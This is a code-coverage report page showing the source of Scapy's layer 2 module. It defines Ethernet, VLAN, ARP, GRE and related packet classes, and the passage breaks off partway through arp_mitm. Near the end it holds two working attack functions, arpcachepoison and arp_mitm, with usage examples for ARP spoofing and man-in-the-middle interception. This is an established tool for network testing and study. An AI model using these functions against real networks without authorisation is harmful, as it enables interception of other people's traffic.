Coverage for /pythoncovmergedfiles/medio/medio/usr/local/lib/python3.11/site-packages/scapy/layers/l2.py: 50%
Shortcuts on this page
r m x toggle line displays
j k next/prev highlighted chunk
0 (zero) top of page
1 (one) first highlighted chunk
Shortcuts on this page
r m x toggle line displays
j k next/prev highlighted chunk
0 (zero) top of page
1 (one) first highlighted chunk
1# SPDX-License-Identifier: GPL-2.0-only
2# This file is part of Scapy
3# See https://scapy.net/ for more information
4# Copyright (C) Philippe Biondi <phil@secdev.org>
6"""
7Classes and functions for layer 2 protocols.
8"""
10import itertools
11import socket
12import struct
13import time
15from scapy.ansmachine import AnsweringMachine
16from scapy.arch import get_if_addr, get_if_hwaddr
17from scapy.base_classes import Gen, Net, _ScopedIP
18from scapy.compat import chb
19from scapy.config import conf
20from scapy import consts
21from scapy.data import ARPHDR_ETHER, ARPHDR_LOOPBACK, ARPHDR_METRICOM, \
22 DLT_ETHERNET_MPACKET, DLT_LINUX_IRDA, DLT_LINUX_SLL, DLT_LINUX_SLL2, \
23 DLT_LOOP, DLT_NULL, ETHER_ANY, ETHER_BROADCAST, ETHER_TYPES, ETH_P_ARP, ETH_P_MACSEC
24from scapy.error import (
25 ScapyNoDstMacException,
26 log_runtime,
27 warning,
28)
29from scapy.fields import (
30 BCDFloatField,
31 BitField,
32 ByteEnumField,
33 ByteField,
34 ConditionalField,
35 FCSField,
36 FieldLenField,
37 IP6Field,
38 IPField,
39 IntEnumField,
40 IntField,
41 LenField,
42 MACField,
43 MultipleTypeField,
44 OUIField,
45 ShortEnumField,
46 ShortField,
47 SourceIP6Field,
48 SourceIPField,
49 StrFixedLenField,
50 StrLenField,
51 ThreeBytesField,
52 XByteField,
53 XIntField,
54 XShortEnumField,
55 XShortField,
56)
57from scapy.interfaces import _GlobInterfaceType, resolve_iface
58from scapy.packet import bind_layers, Packet
59from scapy.plist import (
60 PacketList,
61 QueryAnswer,
62 SndRcvList,
63 _PacketList,
64)
65from scapy.sendrecv import sendp, srp, srp1, srploop
66from scapy.utils import (
67 checksum,
68 hexdump,
69 hexstr,
70 in4_getnsmac,
71 in4_ismaddr,
72 inet_aton,
73 inet_ntoa,
74 mac2str,
75 pretty_list,
76 valid_mac,
77 valid_net,
78 valid_net6,
79)
81# Typing imports
82from typing import (
83 Any,
84 Callable,
85 Dict,
86 Iterable,
87 List,
88 Optional,
89 Tuple,
90 Type,
91 Union,
92 cast,
93)
94from scapy.interfaces import NetworkInterface
97if conf.route is None:
98 # unused import, only to initialize conf.route
99 import scapy.route # noqa: F401
102# type definitions
103_ResolverCallable = Callable[[Packet, Packet], Optional[str]]
105#################
106# Tools #
107#################
110class Neighbor:
111 def __init__(self):
112 # type: () -> None
113 self.resolvers = {} # type: Dict[Tuple[Type[Packet], Type[Packet]], _ResolverCallable] # noqa: E501
115 def register_l3(self, l2, l3, resolve_method):
116 # type: (Type[Packet], Type[Packet], _ResolverCallable) -> None
117 self.resolvers[l2, l3] = resolve_method
119 def resolve(self, l2inst, l3inst):
120 # type: (Packet, Packet) -> Optional[str]
121 k = l2inst.__class__, l3inst.__class__
122 if k in self.resolvers:
123 return self.resolvers[k](l2inst, l3inst)
124 return None
126 def __repr__(self):
127 # type: () -> str
128 return "\n".join("%-15s -> %-15s" % (l2.__name__, l3.__name__) for l2, l3 in self.resolvers) # noqa: E501
131conf.neighbor = Neighbor()
133# cache entries expire after 120s
134_arp_cache = conf.netcache.new_cache("arp_cache", 120)
137@conf.commands.register
138def getmacbyip(ip, chainCC=0):
139 # type: (str, int) -> Optional[str]
140 """
141 Returns the destination MAC address used to reach a given IP address.
143 This will follow the routing table and will issue an ARP request if
144 necessary. Special cases (multicast, etc.) are also handled.
146 .. seealso:: :func:`~scapy.layers.inet6.getmacbyip6` for IPv6.
147 """
148 # Sanitize the IP
149 if isinstance(ip, Net):
150 ip = next(iter(ip))
151 ip = inet_ntoa(inet_aton(ip or "0.0.0.0"))
153 # Multicast
154 if in4_ismaddr(ip): # mcast @
155 mac = in4_getnsmac(inet_aton(ip))
156 return mac
158 # Check the routing table
159 iff, _, gw = conf.route.route(ip)
161 # Limited broadcast
162 if ip == "255.255.255.255":
163 return "ff:ff:ff:ff:ff:ff"
165 # Directed broadcast
166 if (iff == conf.loopback_name) or (ip in conf.route.get_if_bcast(iff)):
167 return "ff:ff:ff:ff:ff:ff"
169 # An ARP request is necessary
170 if gw != "0.0.0.0":
171 ip = gw
173 # Check the cache
174 mac = _arp_cache.get(ip)
175 if mac:
176 return mac
178 try:
179 res = srp1(Ether(dst=ETHER_BROADCAST) / ARP(op="who-has", pdst=ip),
180 type=ETH_P_ARP,
181 iface=iff,
182 timeout=2,
183 verbose=0,
184 chainCC=chainCC,
185 nofilter=1)
186 except Exception as ex:
187 warning("getmacbyip failed on %s", ex)
188 return None
189 if res is not None:
190 mac = res.payload.hwsrc
191 _arp_cache[ip] = mac
192 return mac
193 return None
196# Fields
198class DestMACField(MACField):
199 def __init__(self, name):
200 # type: (str) -> None
201 MACField.__init__(self, name, None)
203 def i2h(self, pkt, x):
204 # type: (Optional[Packet], Optional[str]) -> str
205 if x is None and pkt is not None:
206 x = None
207 return super(DestMACField, self).i2h(pkt, x)
209 def i2m(self, pkt, x):
210 # type: (Optional[Packet], Optional[str]) -> bytes
211 if x is None and pkt is not None:
212 try:
213 x = conf.neighbor.resolve(pkt, pkt.payload)
214 except socket.error:
215 pass
216 if x is None:
217 if conf.raise_no_dst_mac:
218 raise ScapyNoDstMacException()
219 else:
220 x = "ff:ff:ff:ff:ff:ff"
221 warning(
222 "MAC address to reach destination not found. Using broadcast."
223 )
224 return super(DestMACField, self).i2m(pkt, x)
227class SourceMACField(MACField):
228 __slots__ = ["getif"]
230 def __init__(self, name, getif=None):
231 # type: (str, Optional[Any]) -> None
232 MACField.__init__(self, name, None)
233 self.getif = (lambda pkt: pkt.route()[0]) if getif is None else getif
235 def i2h(self, pkt, x):
236 # type: (Optional[Packet], Optional[str]) -> str
237 if x is None:
238 iff = self.getif(pkt)
239 if iff:
240 x = resolve_iface(iff).mac
241 if x is None:
242 x = "00:00:00:00:00:00"
243 return super(SourceMACField, self).i2h(pkt, x)
245 def i2m(self, pkt, x):
246 # type: (Optional[Packet], Optional[Any]) -> bytes
247 return super(SourceMACField, self).i2m(pkt, self.i2h(pkt, x))
250# Layers
252HARDWARE_TYPES = {
253 1: "Ethernet (10Mb)",
254 2: "Ethernet (3Mb)",
255 3: "AX.25",
256 4: "Proteon ProNET Token Ring",
257 5: "Chaos",
258 6: "IEEE 802 Networks",
259 7: "ARCNET",
260 8: "Hyperchannel",
261 9: "Lanstar",
262 10: "Autonet Short Address",
263 11: "LocalTalk",
264 12: "LocalNet",
265 13: "Ultra link",
266 14: "SMDS",
267 15: "Frame relay",
268 16: "ATM",
269 17: "HDLC",
270 18: "Fibre Channel",
271 19: "ATM",
272 20: "Serial Line",
273 21: "ATM",
274}
276ETHER_TYPES[0x88a8] = '802_1AD'
277ETHER_TYPES[0x88e7] = '802_1AH'
278ETHER_TYPES[ETH_P_MACSEC] = '802_1AE'
281class Ether(Packet):
282 name = "Ethernet"
283 fields_desc = [DestMACField("dst"),
284 SourceMACField("src"),
285 XShortEnumField("type", 0x9000, ETHER_TYPES)]
286 __slots__ = ["_defrag_pos"]
288 def hashret(self):
289 # type: () -> bytes
290 return struct.pack("H", self.type) + self.payload.hashret()
292 def answers(self, other):
293 # type: (Packet) -> int
294 if isinstance(other, Ether):
295 if self.type == other.type:
296 return self.payload.answers(other.payload)
297 return 0
299 def mysummary(self):
300 # type: () -> str
301 return self.sprintf("%src% > %dst% (%type%)")
303 @classmethod
304 def dispatch_hook(cls, _pkt=None, *args, **kargs):
305 # type: (Optional[bytes], *Any, **Any) -> Type[Packet]
306 if _pkt and len(_pkt) >= 14:
307 if struct.unpack("!H", _pkt[12:14])[0] <= 1500:
308 return Dot3
309 return cls
312class Dot3(Packet):
313 name = "802.3"
314 fields_desc = [DestMACField("dst"),
315 SourceMACField("src"),
316 LenField("len", None, "H")]
318 def extract_padding(self, s):
319 # type: (bytes) -> Tuple[bytes, bytes]
320 tmp_len = self.len
321 return s[:tmp_len], s[tmp_len:]
323 def answers(self, other):
324 # type: (Packet) -> int
325 if isinstance(other, Dot3):
326 return self.payload.answers(other.payload)
327 return 0
329 def mysummary(self):
330 # type: () -> str
331 return "802.3 %s > %s" % (self.src, self.dst)
333 @classmethod
334 def dispatch_hook(cls, _pkt=None, *args, **kargs):
335 # type: (Optional[Any], *Any, **Any) -> Type[Packet]
336 if _pkt and len(_pkt) >= 14:
337 if struct.unpack("!H", _pkt[12:14])[0] > 1500:
338 return Ether
339 return cls
342class LLC(Packet):
343 name = "LLC"
344 fields_desc = [XByteField("dsap", 0x00),
345 XByteField("ssap", 0x00),
346 ByteField("ctrl", 0)]
349def l2_register_l3(l2: Packet, l3: Packet) -> Optional[str]:
350 """
351 Delegates resolving the default L2 destination address to the payload of L3.
352 """
353 neighbor = conf.neighbor # type: Neighbor
354 return neighbor.resolve(l2, l3.payload)
357conf.neighbor.register_l3(Ether, LLC, l2_register_l3)
358conf.neighbor.register_l3(Dot3, LLC, l2_register_l3)
361COOKED_LINUX_PACKET_TYPES = {
362 0: "unicast",
363 1: "broadcast",
364 2: "multicast",
365 3: "unicast-to-another-host",
366 4: "sent-by-us"
367}
370class CookedLinux(Packet):
371 # Documentation: http://www.tcpdump.org/linktypes/LINKTYPE_LINUX_SLL.html
372 name = "cooked linux"
373 # from wireshark's database
374 fields_desc = [ShortEnumField("pkttype", 0, COOKED_LINUX_PACKET_TYPES),
375 XShortField("lladdrtype", 512),
376 ShortField("lladdrlen", 0),
377 StrFixedLenField("src", b"", 8),
378 XShortEnumField("proto", 0x800, ETHER_TYPES)]
381class CookedLinuxV2(CookedLinux):
382 # Documentation: https://www.tcpdump.org/linktypes/LINKTYPE_LINUX_SLL2.html
383 name = "cooked linux v2"
384 fields_desc = [XShortEnumField("proto", 0x800, ETHER_TYPES),
385 ShortField("reserved", 0),
386 IntField("ifindex", 0),
387 XShortField("lladdrtype", 512),
388 ByteEnumField("pkttype", 0, COOKED_LINUX_PACKET_TYPES),
389 ByteField("lladdrlen", 0),
390 StrFixedLenField("src", b"", 8)]
393class MPacketPreamble(Packet):
394 # IEEE 802.3br Figure 99-3
395 name = "MPacket Preamble"
396 fields_desc = [StrFixedLenField("preamble", b"", length=8),
397 FCSField("fcs", 0, fmt="!I")]
400class SNAP(Packet):
401 name = "SNAP"
402 fields_desc = [OUIField("OUI", 0x000000),
403 XShortEnumField("code", 0x000, ETHER_TYPES)]
406conf.neighbor.register_l3(Dot3, SNAP, l2_register_l3)
409class Dot1Q(Packet):
410 name = "802.1Q"
411 aliastypes = [Ether]
412 fields_desc = [BitField("prio", 0, 3),
413 BitField("dei", 0, 1),
414 BitField("vlan", 1, 12),
415 XShortEnumField("type", 0x0000, ETHER_TYPES)]
416 deprecated_fields = {
417 "id": ("dei", "2.5.0"),
418 }
420 def answers(self, other):
421 # type: (Packet) -> int
422 if isinstance(other, Dot1Q):
423 if ((self.type == other.type) and
424 (self.vlan == other.vlan)):
425 return self.payload.answers(other.payload)
426 else:
427 return self.payload.answers(other)
428 return 0
430 def default_payload_class(self, pay):
431 # type: (bytes) -> Type[Packet]
432 if self.type <= 1500:
433 return LLC
434 return conf.raw_layer
436 def extract_padding(self, s):
437 # type: (bytes) -> Tuple[bytes, Optional[bytes]]
438 if self.type <= 1500:
439 return s[:self.type], s[self.type:]
440 return s, None
442 def mysummary(self):
443 # type: () -> str
444 if isinstance(self.underlayer, Ether):
445 return self.underlayer.sprintf("802.1q %Ether.src% > %Ether.dst% (%Dot1Q.type%) vlan %Dot1Q.vlan%") # noqa: E501
446 else:
447 return self.sprintf("802.1q (%Dot1Q.type%) vlan %Dot1Q.vlan%")
450conf.neighbor.register_l3(Ether, Dot1Q, l2_register_l3)
453class STP(Packet):
454 name = "Spanning Tree Protocol"
455 fields_desc = [ShortField("proto", 0),
456 ByteField("version", 0),
457 ByteField("bpdutype", 0),
458 ByteField("bpduflags", 0),
459 ShortField("rootid", 0),
460 MACField("rootmac", ETHER_ANY),
461 IntField("pathcost", 0),
462 ShortField("bridgeid", 0),
463 MACField("bridgemac", ETHER_ANY),
464 ShortField("portid", 0),
465 BCDFloatField("age", 1),
466 BCDFloatField("maxage", 20),
467 BCDFloatField("hellotime", 2),
468 BCDFloatField("fwddelay", 15)]
471class ARP(Packet):
472 name = "ARP"
473 fields_desc = [
474 XShortEnumField("hwtype", 0x0001, HARDWARE_TYPES),
475 XShortEnumField("ptype", 0x0800, ETHER_TYPES),
476 FieldLenField("hwlen", None, fmt="B", length_of="hwsrc"),
477 FieldLenField("plen", None, fmt="B", length_of="psrc"),
478 ShortEnumField("op", 1, {
479 "who-has": 1,
480 "is-at": 2,
481 "RARP-req": 3,
482 "RARP-rep": 4,
483 "Dyn-RARP-req": 5,
484 "Dyn-RAR-rep": 6,
485 "Dyn-RARP-err": 7,
486 "InARP-req": 8,
487 "InARP-rep": 9
488 }),
489 MultipleTypeField(
490 [
491 (SourceMACField("hwsrc"),
492 (lambda pkt: pkt.hwtype == 1 and pkt.hwlen == 6,
493 lambda pkt, val: pkt.hwtype == 1 and (
494 pkt.hwlen == 6 or (pkt.hwlen is None and
495 (val is None or len(val) == 6 or
496 valid_mac(val)))
497 ))),
498 ],
499 StrFixedLenField("hwsrc", None, length_from=lambda pkt: pkt.hwlen),
500 ),
501 MultipleTypeField(
502 [
503 (SourceIPField("psrc"),
504 (lambda pkt: pkt.ptype == 0x0800 and pkt.plen == 4,
505 lambda pkt, val: pkt.ptype == 0x0800 and (
506 pkt.plen == 4 or (pkt.plen is None and
507 (val is None or valid_net(val)))
508 ))),
509 (SourceIP6Field("psrc"),
510 (lambda pkt: pkt.ptype == 0x86dd and pkt.plen == 16,
511 lambda pkt, val: pkt.ptype == 0x86dd and (
512 pkt.plen == 16 or (pkt.plen is None and
513 (val is None or valid_net6(val)))
514 ))),
515 ],
516 StrFixedLenField("psrc", None, length_from=lambda pkt: pkt.plen),
517 ),
518 MultipleTypeField(
519 [
520 (MACField("hwdst", ETHER_ANY),
521 (lambda pkt: pkt.hwtype == 1 and pkt.hwlen == 6,
522 lambda pkt, val: pkt.hwtype == 1 and (
523 pkt.hwlen == 6 or (pkt.hwlen is None and
524 (val is None or len(val) == 6 or
525 valid_mac(val)))
526 ))),
527 ],
528 StrFixedLenField("hwdst", None, length_from=lambda pkt: pkt.hwlen),
529 ),
530 MultipleTypeField(
531 [
532 (IPField("pdst", "0.0.0.0"),
533 (lambda pkt: pkt.ptype == 0x0800 and pkt.plen == 4,
534 lambda pkt, val: pkt.ptype == 0x0800 and (
535 pkt.plen == 4 or (pkt.plen is None and
536 (val is None or valid_net(val)))
537 ))),
538 (IP6Field("pdst", "::"),
539 (lambda pkt: pkt.ptype == 0x86dd and pkt.plen == 16,
540 lambda pkt, val: pkt.ptype == 0x86dd and (
541 pkt.plen == 16 or (pkt.plen is None and
542 (val is None or valid_net6(val)))
543 ))),
544 ],
545 StrFixedLenField("pdst", None, length_from=lambda pkt: pkt.plen),
546 ),
547 ]
549 def hashret(self):
550 # type: () -> bytes
551 return struct.pack(">HHH", self.hwtype, self.ptype,
552 ((self.op + 1) // 2)) + self.payload.hashret()
554 def answers(self, other):
555 # type: (Packet) -> int
556 if not isinstance(other, ARP):
557 return False
558 if self.op != other.op + 1:
559 return False
560 # We use a loose comparison on psrc vs pdst to catch answers
561 # with ARP leaks
562 self_psrc = self.get_field('psrc').i2m(self, self.psrc) # type: bytes
563 other_pdst = other.get_field('pdst').i2m(other, other.pdst) \
564 # type: bytes
565 return self_psrc[:len(other_pdst)] == other_pdst[:len(self_psrc)]
567 def route(self):
568 # type: () -> Tuple[Optional[str], Optional[str], Optional[str]]
569 fld, dst = cast(Tuple[MultipleTypeField, str],
570 self.getfield_and_val("pdst"))
571 fld_inner, dst = fld._find_fld_pkt_val(self, dst)
572 scope = None
573 if isinstance(dst, (Net, _ScopedIP)):
574 scope = dst.scope
575 if isinstance(dst, Gen):
576 dst = next(iter(dst))
577 if isinstance(fld_inner, IP6Field):
578 return conf.route6.route(dst, dev=scope)
579 elif isinstance(fld_inner, IPField):
580 return conf.route.route(dst, dev=scope)
581 else:
582 return None, None, None
584 def extract_padding(self, s):
585 # type: (bytes) -> Tuple[bytes, bytes]
586 return b"", s
588 def mysummary(self):
589 # type: () -> str
590 if self.op == 1:
591 return self.sprintf("ARP who has %pdst% says %psrc%")
592 if self.op == 2:
593 return self.sprintf("ARP is at %hwsrc% says %psrc%")
594 return self.sprintf("ARP %op% %psrc% > %pdst%")
597def l2_register_l3_arp(l2: Packet, l3: Packet) -> Optional[str]:
598 """
599 Resolves the default L2 destination address when ARP is used.
600 """
601 if l3.op == 1: # who-has
602 return "ff:ff:ff:ff:ff:ff"
603 elif l3.op == 2: # is-at
604 log_runtime.warning(
605 "You should be providing the Ethernet destination MAC address when "
606 "sending an is-at ARP."
607 )
608 # Need ARP request to send ARP request...
609 plen = l3.get_field("pdst").i2len(l3, l3.pdst)
610 if plen == 4:
611 return getmacbyip(l3.pdst)
612 elif plen == 32:
613 from scapy.layers.inet6 import getmacbyip6
614 return getmacbyip6(l3.pdst)
615 # Can't even do that
616 log_runtime.warning(
617 "You should be providing the Ethernet destination mac when sending this "
618 "kind of ARP packets."
619 )
620 return None
623conf.neighbor.register_l3(Ether, ARP, l2_register_l3_arp)
626class GRErouting(Packet):
627 name = "GRE routing information"
628 fields_desc = [ShortField("address_family", 0),
629 ByteField("SRE_offset", 0),
630 FieldLenField("SRE_len", None, "routing_info", "B"),
631 StrLenField("routing_info", b"",
632 length_from=lambda pkt: pkt.SRE_len),
633 ]
636class GRE(Packet):
637 name = "GRE"
638 deprecated_fields = {
639 "seqence_number": ("sequence_number", "2.4.4"),
640 }
641 fields_desc = [BitField("chksum_present", 0, 1),
642 BitField("routing_present", 0, 1),
643 BitField("key_present", 0, 1),
644 BitField("seqnum_present", 0, 1),
645 BitField("strict_route_source", 0, 1),
646 BitField("recursion_control", 0, 3),
647 BitField("flags", 0, 5),
648 BitField("version", 0, 3),
649 XShortEnumField("proto", 0x0000, ETHER_TYPES),
650 ConditionalField(XShortField("chksum", None), lambda pkt:pkt.chksum_present == 1 or pkt.routing_present == 1), # noqa: E501
651 ConditionalField(XShortField("offset", None), lambda pkt:pkt.chksum_present == 1 or pkt.routing_present == 1), # noqa: E501
652 ConditionalField(XIntField("key", None), lambda pkt:pkt.key_present == 1), # noqa: E501
653 ConditionalField(XIntField("sequence_number", None), lambda pkt:pkt.seqnum_present == 1), # noqa: E501
654 ]
656 @classmethod
657 def dispatch_hook(cls, _pkt=None, *args, **kargs):
658 # type: (Optional[Any], *Any, **Any) -> Type[Packet]
659 if _pkt and struct.unpack("!H", _pkt[2:4])[0] == 0x880b:
660 return GRE_PPTP
661 return cls
663 def post_build(self, p, pay):
664 # type: (bytes, bytes) -> bytes
665 p += pay
666 if self.chksum_present and self.chksum is None:
667 c = checksum(p)
668 p = p[:4] + chb((c >> 8) & 0xff) + chb(c & 0xff) + p[6:]
669 return p
672class GRE_PPTP(GRE):
674 """
675 Enhanced GRE header used with PPTP
676 RFC 2637
677 """
679 name = "GRE PPTP"
680 deprecated_fields = {
681 "seqence_number": ("sequence_number", "2.4.4"),
682 }
683 fields_desc = [BitField("chksum_present", 0, 1),
684 BitField("routing_present", 0, 1),
685 BitField("key_present", 1, 1),
686 BitField("seqnum_present", 0, 1),
687 BitField("strict_route_source", 0, 1),
688 BitField("recursion_control", 0, 3),
689 BitField("acknum_present", 0, 1),
690 BitField("flags", 0, 4),
691 BitField("version", 1, 3),
692 XShortEnumField("proto", 0x880b, ETHER_TYPES),
693 ShortField("payload_len", None),
694 ShortField("call_id", None),
695 ConditionalField(XIntField("sequence_number", None), lambda pkt: pkt.seqnum_present == 1), # noqa: E501
696 ConditionalField(XIntField("ack_number", None), lambda pkt: pkt.acknum_present == 1)] # noqa: E501
698 def post_build(self, p, pay):
699 # type: (bytes, bytes) -> bytes
700 p += pay
701 if self.payload_len is None:
702 pay_len = len(pay)
703 p = p[:4] + chb((pay_len >> 8) & 0xff) + chb(pay_len & 0xff) + p[6:] # noqa: E501
704 return p
707# *BSD loopback layer
709class LoIntEnumField(IntEnumField):
711 def m2i(self, pkt, x):
712 # type: (Optional[Packet], int) -> int
713 return x >> 24
715 def i2m(self, pkt, x):
716 # type: (Optional[Packet], Union[List[int], int, None]) -> int
717 return cast(int, x) << 24
720# https://github.com/wireshark/wireshark/blob/fe219637a6748130266a0b0278166046e60a2d68/epan/dissectors/packet-null.c
721# https://www.wireshark.org/docs/wsar_html/epan/aftypes_8h.html
722LOOPBACK_TYPES = {0x2: "IPv4",
723 0x7: "OSI",
724 0x10: "Appletalk",
725 0x17: "Netware IPX/SPX",
726 0x18: "IPv6", 0x1c: "IPv6", 0x1e: "IPv6"}
729# On OpenBSD, Loopback = LoopbackOpenBSD. On other platforms, the 2 are available.
730# This is to be compatible with both tcpdump and tshark
732class Loopback(Packet):
733 r"""
734 \*BSD loopback layer
735 """
736 __slots__ = ["_defrag_pos"]
737 name = "Loopback"
738 if consts.OPENBSD:
739 fields_desc = [IntEnumField("type", 0x2, LOOPBACK_TYPES)]
740 else:
741 fields_desc = [LoIntEnumField("type", 0x2, LOOPBACK_TYPES)]
744if consts.OPENBSD:
745 LoopbackOpenBSD = Loopback
746else:
747 class LoopbackOpenBSD(Loopback):
748 name = "OpenBSD Loopback"
749 fields_desc = [IntEnumField("type", 0x2, LOOPBACK_TYPES)]
752class Dot1AD(Dot1Q):
753 name = '802_1AD'
756class Dot1AH(Packet):
757 name = "802_1AH"
758 fields_desc = [BitField("prio", 0, 3),
759 BitField("dei", 0, 1),
760 BitField("nca", 0, 1),
761 BitField("res1", 0, 1),
762 BitField("res2", 0, 2),
763 ThreeBytesField("isid", 0)]
765 def answers(self, other):
766 # type: (Packet) -> int
767 if isinstance(other, Dot1AH):
768 if self.isid == other.isid:
769 return self.payload.answers(other.payload)
770 return 0
772 def mysummary(self):
773 # type: () -> str
774 return self.sprintf("802.1ah (isid=%Dot1AH.isid%")
777conf.neighbor.register_l3(Ether, Dot1AH, l2_register_l3)
780bind_layers(Dot3, LLC)
781bind_layers(Ether, LLC, type=122)
782bind_layers(Ether, LLC, type=34928)
783bind_layers(Ether, Dot1Q, type=33024)
784bind_layers(Ether, Dot1AD, type=0x88a8)
785bind_layers(Ether, Dot1AH, type=0x88e7)
786bind_layers(Dot1AD, Dot1AD, type=0x88a8)
787bind_layers(Dot1AD, Dot1Q, type=0x8100)
788bind_layers(Dot1AD, Dot1AH, type=0x88e7)
789bind_layers(Dot1Q, Dot1AD, type=0x88a8)
790bind_layers(Dot1Q, Dot1AH, type=0x88e7)
791bind_layers(Dot1AH, Ether)
792bind_layers(Ether, Ether, type=1)
793bind_layers(Ether, ARP, type=2054)
794bind_layers(CookedLinux, LLC, proto=122)
795bind_layers(CookedLinux, Dot1Q, proto=33024)
796bind_layers(CookedLinux, Dot1AD, type=0x88a8)
797bind_layers(CookedLinux, Dot1AH, type=0x88e7)
798bind_layers(CookedLinux, Ether, proto=1)
799bind_layers(CookedLinux, ARP, proto=2054)
800bind_layers(MPacketPreamble, Ether)
801bind_layers(GRE, LLC, proto=122)
802bind_layers(GRE, Dot1Q, proto=33024)
803bind_layers(GRE, Dot1AD, type=0x88a8)
804bind_layers(GRE, Dot1AH, type=0x88e7)
805bind_layers(GRE, Ether, proto=0x6558)
806bind_layers(GRE, ARP, proto=2054)
807bind_layers(GRE, GRErouting, {"routing_present": 1})
808bind_layers(GRErouting, conf.raw_layer, {"address_family": 0, "SRE_len": 0})
809bind_layers(GRErouting, GRErouting)
810bind_layers(LLC, STP, dsap=66, ssap=66, ctrl=3)
811bind_layers(LLC, SNAP, dsap=170, ssap=170, ctrl=3)
812bind_layers(SNAP, Dot1Q, code=33024)
813bind_layers(SNAP, Dot1AD, type=0x88a8)
814bind_layers(SNAP, Dot1AH, type=0x88e7)
815bind_layers(SNAP, Ether, code=1)
816bind_layers(SNAP, ARP, code=2054)
817bind_layers(SNAP, STP, code=267)
819conf.l2types.register(ARPHDR_ETHER, Ether)
820conf.l2types.register_num2layer(ARPHDR_METRICOM, Ether)
821conf.l2types.register_num2layer(ARPHDR_LOOPBACK, Ether)
822conf.l2types.register_layer2num(ARPHDR_ETHER, Dot3)
823conf.l2types.register(DLT_LINUX_SLL, CookedLinux)
824conf.l2types.register(DLT_LINUX_SLL2, CookedLinuxV2)
825conf.l2types.register(DLT_ETHERNET_MPACKET, MPacketPreamble)
826conf.l2types.register_num2layer(DLT_LINUX_IRDA, CookedLinux)
827conf.l2types.register(DLT_NULL, Loopback)
828conf.l2types.register(DLT_LOOP, LoopbackOpenBSD)
830conf.l3types.register(ETH_P_ARP, ARP)
833# Techniques
836@conf.commands.register
837def arpcachepoison(
838 target, # type: Union[str, List[str]]
839 addresses, # type: Union[str, Tuple[str, str], List[Tuple[str, str]]]
840 broadcast=False, # type: bool
841 count=None, # type: Optional[int]
842 interval=15, # type: int
843 **kwargs, # type: Any
844):
845 # type: (...) -> None
846 """Poison targets' ARP cache
848 :param target: Can be an IP, subnet (string) or a list of IPs. This lists the IPs
849 or the subnet that will be poisoned.
850 :param addresses: Can be either a string, a tuple of a list of tuples.
851 If it's a string, it's the IP to advertise to the victim,
852 with the local interface's MAC. If it's a tuple,
853 it's ("IP", "MAC"). It it's a list, it's [("IP", "MAC")].
854 "IP" can be a subnet of course.
855 :param broadcast: Use broadcast ethernet
857 Examples for target "192.168.0.2"::
859 >>> arpcachepoison("192.168.0.2", "192.168.0.1")
860 >>> arpcachepoison("192.168.0.1/24", "192.168.0.1")
861 >>> arpcachepoison(["192.168.0.2", "192.168.0.3"], "192.168.0.1")
862 >>> arpcachepoison("192.168.0.2", ("192.168.0.1", get_if_hwaddr("virbr0")))
863 >>> arpcachepoison("192.168.0.2", [("192.168.0.1", get_if_hwaddr("virbr0"),
864 ... ("192.168.0.2", "aa:aa:aa:aa:aa:aa")])
866 """
867 if isinstance(target, str):
868 targets = Net(target) # type: Union[Net, List[str]]
869 str_target = target
870 else:
871 targets = target
872 str_target = target[0]
873 if isinstance(addresses, str):
874 couple_list = [(addresses, get_if_hwaddr(conf.route.route(str_target)[0]))]
875 elif isinstance(addresses, tuple):
876 couple_list = [addresses]
877 else:
878 couple_list = addresses
879 p: List[Packet] = [
880 Ether(src=y, dst="ff:ff:ff:ff:ff:ff" if broadcast else None) /
881 ARP(op="who-has", psrc=x, pdst=targets,
882 hwsrc=y, hwdst="00:00:00:00:00:00")
883 for x, y in couple_list
884 ]
885 if count is not None:
886 sendp(p, iface_hint=str_target, count=count, inter=interval, **kwargs)
887 return
888 try:
889 while True:
890 sendp(p, iface_hint=str_target, **kwargs)
891 time.sleep(interval)
892 except KeyboardInterrupt:
893 pass
896@conf.commands.register
897def arp_mitm(
898 ip1, # type: str
899 ip2, # type: str
900 mac1=None, # type: Optional[Union[str, List[str]]]
901 mac2=None, # type: Optional[Union[str, List[str]]]
902 broadcast=False, # type: bool
903 target_mac=None, # type: Optional[str]
904 iface=None, # type: Optional[_GlobInterfaceType]
905 inter=3, # type: int
906):
907 # type: (...) -> None
908 r"""ARP MitM: poison 2 target's ARP cache
910 :param ip1: IPv4 of the first machine
911 :param ip2: IPv4 of the second machine
912 :param mac1: MAC of the first machine (optional: will ARP otherwise)
913 :param mac2: MAC of the second machine (optional: will ARP otherwise)
914 :param broadcast: if True, will use broadcast mac for MitM by default
915 :param target_mac: MAC of the attacker (optional: default to the interface's one)
916 :param iface: the network interface. (optional: default, route for ip1)
918 Example usage::
920 $ sysctl net.ipv4.conf.virbr0.send_redirects=0 # virbr0 = interface
921 $ sysctl net.ipv4.ip_forward=1
922 $ sudo iptables -t mangle -A PREROUTING -j TTL --ttl-inc 1
923 $ sudo scapy
924 >>> arp_mitm("192.168.122.156", "192.168.122.17")
926 Alternative usages:
927 >>> arp_mitm("10.0.0.1", "10.1.1.0/21", iface="eth1")
928 >>> arp_mitm("10.0.0.1", "10.1.1.2",
929 ... target_mac="aa:aa:aa:aa:aa:aa",
930 ... mac2="00:1e:eb:bf:c1:ab")
932 .. warning::
933 If using a subnet, this will first perform an arping, unless broadcast is on!
935 Remember to change the sysctl settings back..
936 """
937 if not iface:
938 iface = conf.route.route(ip1)[0]
939 if not target_mac:
940 target_mac = get_if_hwaddr(iface)
942 def _tups(ip, mac):
943 # type: (str, Optional[Union[str, List[str]]]) -> Iterable[Tuple[str, str]]
944 if mac is None:
945 if broadcast:
946 # ip can be a Net/list/etc and will be iterated upon while sending
947 return [(ip, "ff:ff:ff:ff:ff:ff")]
948 return [(x.query.pdst, x.answer.hwsrc)
949 for x in arping(ip, verbose=0, iface=iface)[0]]
950 elif isinstance(mac, list):
951 return [(ip, x) for x in mac]
952 else:
953 return [(ip, mac)]
955 tup1 = _tups(ip1, mac1)
956 if not tup1:
957 raise OSError(f"Could not resolve {ip1}")
958 tup2 = _tups(ip2, mac2)
959 if not tup2:
960 raise OSError(f"Could not resolve {ip2}")
961 print(f"MITM on {iface}: %s <--> {target_mac} <--> %s" % (
962 [x[1] for x in tup1],
963 [x[1] for x in tup2],
964 ))
965 # We loop who-has requests
966 srploop(
967 list(itertools.chain(
968 (x
969 for ipa, maca in tup1
970 for ipb, _ in tup2
971 if ipb != ipa
972 for x in
973 Ether(dst=maca, src=target_mac) /
974 ARP(op="who-has", psrc=ipb, pdst=ipa,
975 hwsrc=target_mac, hwdst="00:00:00:00:00:00")
976 ),
977 (x
978 for ipb, macb in tup2
